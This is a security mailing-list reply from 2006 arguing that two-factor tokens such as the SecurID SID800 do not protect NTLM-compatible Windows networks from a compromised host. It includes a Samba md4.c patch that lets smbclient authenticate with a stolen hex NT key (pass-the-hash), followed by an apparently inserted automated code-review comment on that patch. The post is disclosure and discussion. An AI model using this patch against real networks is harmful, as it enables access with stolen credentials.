Re[3]: RSA SecurID SID800 Token vulnerable by design
Dear Brian Eaton,
--Saturday, September 9, 2006, 6:12:31 PM, you wrote to 3APA3A@xxxxxxxxxxxxxxxx:
BE> For web SSO in particular, accessing the token once is nearly as good
BE> as accessing it constantly. The token will be used for the initial
BE> authentication, but normally a cookie will be used for session
BE> tracking. An attacker who can sniff the token code can certainly
BE> steal the cookie as well.
BE> Two-factor auth cannot be said to make accessing the network from a
BE> compromised PC "safe". That does not make two-factor auth useless.
BE> With plain passwords, once the attacker has the password, they can
BE> access the network at will. With two-factor auth, they can access
BE> the network for a much more limited time span.
The network is compromised as long as the attacker keeps control over
the compromised host, regardless of authentication. And sometimes longer.

At least for some implementations of 2-factor authentication schemas
under Windows (I'm not sure about this very implementation), the
situation may not be significantly different from the Web-based
scenario. For compatibility with NTLM authentication, the user's
extended credentials are simply mapped to his account, and it's possible
to connect to the network using the user's NT key. In a standard Windows
environment, the NT key is derived from the password. For an extended
authentication schema, it can be set to some random value. The NT key is
stored in the memory of the compromised host and thus can be extracted.

An example patch for SAMBA smbclient to use a hex-coded NT key instead
of a password:
--- md4.c.orig 2004-04-04 11:37:00.000000000 +0400
+++ md4.c 2004-10-27 23:01:31.000000000 +0400
@@ -130,6 +130,21 @@
C = 0x98badcfe;
D = 0x10325476;
+
+ if(n == 64){
+ int j;
+ unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
+ for(j = 0; j<16; j++){
+ if(!strchr(hexd, in[(j<<2)]))break;
+ if(in[(j<<2)+1])break;
+ if(!strchr(hexd, in[(j<<2)+2]))break;
+ if(in[(j<<2)+3])break;
+ out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
+ out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
+ }
+ if(j == 16) return;
+ }
+
while (n > 64) {
copy64(M, in);
mdfour64(M);
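
Review bot: the digit checks in the added loop accept a zero byte as a hex digit, because strchr() also matches the string's terminating NUL: with in[(j<<2)] == 0, the test `if(!strchr(hexd, in[(j<<2)]))break;` does not break, and the decode on the following lines computes an index of 16, which is outside the nibble range. Check for a non-zero byte before the strchr() lookup (or bound the search to the 16 digit characters), and note that lower-case a-f is rejected, so such input silently falls through to normal hashing. A second concern is that the special case sits inside the MD4 routine itself and is triggered only by the shape of the input (n == 64 with every second byte zero), so any caller hashing a genuine 64-byte buffer of that form, such as a 32-character password made of upper-case hex digits, gets its input copied to out instead of hashed; an explicit caller-side option would avoid changing the hash function's behaviour for everyone. The visible lines also do not show whether string.h is included for strchr().
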
It means that if the authentication schema is NTLM-compatible (it must
be for compatibility with pre-Windows 2000 hosts and some network
applications, like Outlook Express), an attacker can use a compromised
account to access network resources without having access to the
2-factor authentication device. How long he can retain this access
depends on how often the account's NT key is changed (usually with a
password change, but it actually depends on the implementation of the
authentication system and may be never).
--
~/ZARAZA
http://www.security.nnov.ru/